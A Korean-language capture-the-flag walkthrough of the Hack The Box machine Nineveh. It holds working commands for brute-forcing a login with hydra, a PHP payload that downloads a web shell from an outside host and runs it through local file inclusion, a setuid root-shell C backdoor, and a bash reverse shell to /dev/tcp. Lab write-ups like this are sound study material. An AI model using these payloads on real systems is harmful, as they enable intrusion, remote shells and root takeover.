[Linux] Nineveh

HTB

Nineveh: 난이도 쌉쌉어려움

1. 웹퍼징할 때, common.txt에 없는 리스트 시도해봐야 함...

2. HOST로 지정된 주소와 IP로 접근하는 방식에 차이가 있었음. vhost 지정때문에 접근이 안되기도함

3. 히드라 사용할때 http,https 등 IP(host)주소에 프로토콜을 넣으면 안됨.

   (Https 브루트포스 지원함, 비밀번호만 공격시 아이디는 아무값 넣어주면됨)

4. searchsploit에 취약점이 나오지만 보안약점이 수정된 래빗홀(phpliteadmin) 일 수 있다.

   - 여러번 해봐도 잘 안된다면 다른 방법과 길이 없는지 생각해봐야 함 

   - 또한 특정 행위, 예를 들어 업로드까지 가능하다면 다른 취약점 백터와 연계될 수 있음을 생각해봐야한다.

   - 파일 업로드가 되고 경로까지 알 수 있다면 이후 실행을 위해 LFI를 찾아봐야함

   => Recon 놓쳤던 부분 없는지 다시 진행

5. 수상한 힌트, png파일에 시크릿토큰이 있는지 exif와 strings로 확인해봐야한다.

6. 어떤 포트에 대한 접속을 빈번히하여 서버 응답이 멈춘다면 포트노킹을 의심해볼 수 있다.

hydra - https option

- 히드라 주요 옵션별로 정리할 필요가 있음

hydra -l test -P /tools/rockyou.txt www.nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&^USER^:Incorrect" -v

gobuster options: 고버스터도 확장자 붙이기가 가능하다는거 오늘 알았음, output 옵션도 ㅋ

-x: 확장자

-o: 저장할 파일명

-t: Thread 숫자 (기본 10개) 

gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o scans/gobuster-http-root-medium -t 20

LFI

- 문제를 꾀나 복잡하게 꼬았음.

- phpliteadmin으로 쉘 업로드 후 LFI로 실행

- LFI가 심증으로 확실한데 안됨 ㅋ 

- 경로 내부에 NinevehNotes.txt 문자열이 없으면 LFI가 실행 안되는거였음

/department/manage.php?notes=/var/tmp/ninevehNotes.txt.writeup.php

phpliteadmin 1.9.3 exploit

-Fail: PHP 원라인 쉘은 nc가 바로 끊킴

-Success: <?php exec("wget 10.10.14.37:8000/shell.php -O /var/tmp/shell.php" ?>

Pentest monkey의 Php웹 쉘파일을 다운로드 받아서 LFI로 실행하였음

Secret_Note

- PNG파일을 strings로 확인, SSH개인키가 들어가있음

- 이정도면 OSCP보다는 CTF급 문제임

포트노킹

ps에서 knockd 확인해보고 설정파일을 find로 검색해볼 것

노킹 설정파일: /etc/knockd.conf 

설정파일 포트 순서로 적음 571 290 911

root@kali# for i in 571 290 911; do

> nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 >/dev/null

> done; ssh -i ~/keys/id_rsa_nineveh_amrois amrois@10.10.10.43

* 한줄씩 붙여넣어도 되고 쉘스크립트 만들어서 돌려도됨

권한상승 (chrootkit exploit)

linEnum.sh 돌려보면 유니크한 폴더와 스크립트 발견가능

/usr/sbin/report-reset.sh

/reports/

/reports 디렉토리를 계속 ls -la 해보면 파일이 생성 및 삭제가 되고 있는데

잠시동안 root로 생성되고 삭제되는 파일이 있었음

그리고 어떻게 할줄 몰라서 롸잇업을 읽었다....

생성되는 파일을 읽어보면  can't exec ./chk..어쩌구 파일이 있음 

chkwtmp, chklastlog => chkrootkit임을 알 수 있다는데,

솔직히 이거 어케암 ㅋ 롸잇업 없이 풀려면 며칠을 노가다 Enumeration 해봐야할듯

searchsploit chkrootkit 검색하여 exploit

메타스플로잇안쓰고 exploit 하려면..txt파일의 영문 내용을 읽어야한다.

(* Exploit 작동원리를 이해하고 재현할 수 있는 능력이 필요함, 쉽게 설명해줘 제발..)

chrootkit exploit의 내용은 즉슨, chrootkit이 /tmp에 update 파일을 root 권한으로 실행한다고한다. update 파일명으로 root.txt를 읽을 수 있도록 쉘을 작성 후 report-reset.sh 파일 실행하면 권한상승 성공.

* gcc가 설치되어있다는 가정 하에 백도어 c파일을 만들 수 있음 또는 리버스쉘을 작성하여 root로 연결할 수 있다.

1. 백도어

#include <stdio.h>

main()

{

  setuid(0);

  setgid(0);

  system("/bin/bash");

 }

2. 리버스 쉘

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.24/443 0>&1

*핵더박스에 있는 롸잇업 더 읽어봐야 함 

자세한 내용 참고

https://0xdf.gitlab.io/2020/04/22/htb-nineveh.html